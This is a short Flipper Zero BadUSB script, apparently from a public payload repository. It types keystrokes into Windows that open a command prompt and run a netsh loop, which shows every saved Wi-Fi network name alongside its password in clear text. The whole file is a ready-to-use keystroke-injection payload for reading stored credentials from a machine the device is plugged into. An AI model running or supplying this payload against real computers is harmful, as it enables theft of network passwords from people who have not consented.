Flipper/BadUSB/Show_WiFi_Passwords.txt
2022-06-20 22:27:07 -07:00

11 lines
254 B
Plaintext

DELAY 2000
GUI r
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 1500
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
DELAY 250
ENTER